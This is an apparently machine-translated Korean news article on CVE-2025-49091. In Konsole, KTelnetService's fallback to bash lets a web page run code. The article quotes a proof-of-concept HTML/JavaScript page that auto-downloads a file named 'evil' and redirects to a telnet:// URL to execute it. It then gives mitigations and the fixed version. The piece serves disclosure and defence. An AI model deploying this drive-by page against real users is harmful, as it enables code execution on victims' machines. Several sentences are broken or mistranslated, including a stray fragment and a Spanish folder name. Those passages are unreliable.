며칠 전에 다음 정보가 공개되었습니다. 치명적인 취약점"로 식별되었습니다.CVE-2025-49091«. 이 취약점은 Konsole에서 발견됨(KDE 터미널 에뮬레이터를 사용하면 브라우저에서 악성 웹 페이지를 방문하기만 해도 원격으로 코드를 실행할 수 있습니다.
이 문제가 언급되어 있습니다 KTelnetService 및 취약한 Konsole 버전이 있는 시스템에 영향을 미칩니다. 설치되어 있지만 telnet, rlogin 또는 ssh 프로그램 중 하나 이상이 설치되어 있지 않습니다. 이 취약점은 KDE 터미널 에뮬레이터 콘솔에 있습니다. KDE 권고문에 명시된 바와 같이, Konsole 25.04.2 이전 버전은 취약합니다.
Konsole은 다음과 같은 스키마 컨트롤러에서 URL 로딩을 지원합니다.
telnet://URL. 이것은 telnet 여부에 관계없이 실행될 수 있습니다.
이진 파일을 사용할 수 있습니다.이 모드에서는 Telnet을 사용할 수 없는 경우 Konsole에 경로가 있었습니다.
제공된 인수에 대해 bash를 다시 사용합니다.
제공된 URL입니다. 이를 통해 공격자는 임의 코드를 실행할 수 있습니다.
코디 고.일반적으로 사용자가 외부 브라우저를 열면 브라우저에서 메시지가 표시됩니다.
의심스러워 보이고 사용자 상호 작용이 필요할 수 있는 스키마 컨트롤러
악용될 수 있다.
문제의 근원: KTelnetService 및 위험한 URL 체계
연구원들은 이 취약점의 근본적인 문제가 KDE에 기본적으로 포함된 KTelnetService 서비스의 동작에 있다고 지적합니다. 이 서비스는 telnet://, rlogin://, ssh:// URL 스키마 처리를 담당하며, 해당 유틸리티(telnet, rlogin, ssh)를 사용하여 Konsole에서 이러한 링크를 직접 열도록 설계되었습니다.
그러나 이러한 유틸리티가 시스템에 설치되어 있지 않으면 취약점이 발생합니다. 이 경우 Konsole은 링크에 표시된 명령을 실행하려고 할 때 /bin/bash를 대체 경로로 사용합니다. 따라서 공격자는 사용자 지정 링크를 생성할 수 있습니다.
언뜻 보기에는 사소해 보일 수 있지만, 공격자가 사용자 지정 명령을 사용하여 사용자의 다운로드 디렉터리에 있는 모든 파일을 실행할 수 있다는 점에서 문제는 더욱 복잡해집니다. 즉, 사용자가 해당 공격 기법의 링크를 클릭하면 모든 파일이 자동으로 실행됩니다.
왜 이게 이렇게 위험한가요?
Firefox와 Chrome과 같은 최신 브라우저는 기본 설정에서 사용자 확인 없이 다운로드된 파일을 ~/Downloads 폴더에 자동으로 저장합니다. 다운로드가 완료된 후에만 알림을 표시합니다.
이러한 동작은 Linux 시스템에서 브라우저의 현재 디렉토리 경로에 액세스할 수 있다는 사실과 결합되어, 자동으로 다운로드된 악성 파일이 사용자의 지식 없이 Konsole에서 실행될 수 있도록 합니다.
개념 증명(PoC): 취약점이 어떻게 악용되는지
연구원들은 결함의 위험성을 보여주기 위해 다음과 같은 JavaScript 코드 조각을 만들었는데, 이는 공격자가 웹 페이지에서 이 취약점을 어떻게 악용할 수 있는지 보여줍니다.
<html> <head> <script type="text/javascript"> function downloadAndRedirect() { const anchor = document.createElement('a'); anchor.href = "data:;base64,ZWNobyAiSGVsbG8gd29ybGQiCnRvdWNoIC90bXAvZm9vYmFyCg=="; anchor.download = 'evil'; document.body.appendChild(anchor); anchor.click(); document.body.removeChild(anchor); setTimeout(() => { window.location.href = "telnet:///proc/self/cwd/Downloads/evil"; }, 1000); } </script> </head> <body onload="downloadAndRedirect()"> </body> </html>
Firefox와 Chrome에서 사용자가 telnet:// 링크를 수락하면 다음이 호출됩니다.
/usr/bin/konsole --noclose -e telnet /proc/self/cwd/Descargas/evil
그리고 telnet이 존재하지 않으면 악성 스크립트는 bash를 통해 실행됩니다.
임시 완화 조치
패치를 기다리는 동안이나 즉시 업데이트할 수 없는 경우, 문제를 완화할 수 있는 간단한 방법이 두 가지 있습니다.
telnet, rlogin 및 ssh 유틸리티를 설치하세요
이러한 유틸리티가 있으면 Konsole은 해당 유틸리티를 올바르게 호출하고 bash를 사용하지 않습니다. 이를 통해 임의의 콘텐츠가 스크립트로 실행되는 것을 방지할 수 있습니다.
sudo apt install telnet rlogin openssh-client
KTelnetService 서비스 파일을 삭제합니다.
다음 계획을 등록하는 데 책임이 있는 파일을 삭제할 수 있습니다.
sudo rm /usr/share/applications/ktelnetservice6.desktop
이렇게 하면 telnet://, rlogin://, 또는 ssh:// 링크가 Konsole에서 자동으로 처리되지 않습니다.
해결책: Konsole 25.04.2 긴급 업데이트
이 취약점은 KDE Gear 25.04.2 업데이트에 포함된 Konsole 25.04.2 버전에서 수정되었습니다. 모든 사용자와 시스템 관리자는 즉시 업데이트하시기 바랍니다.
마지막으로, 그것에 대해 더 알고 싶다면 자세한 내용을 참조할 수 있습니다. 다음 링크.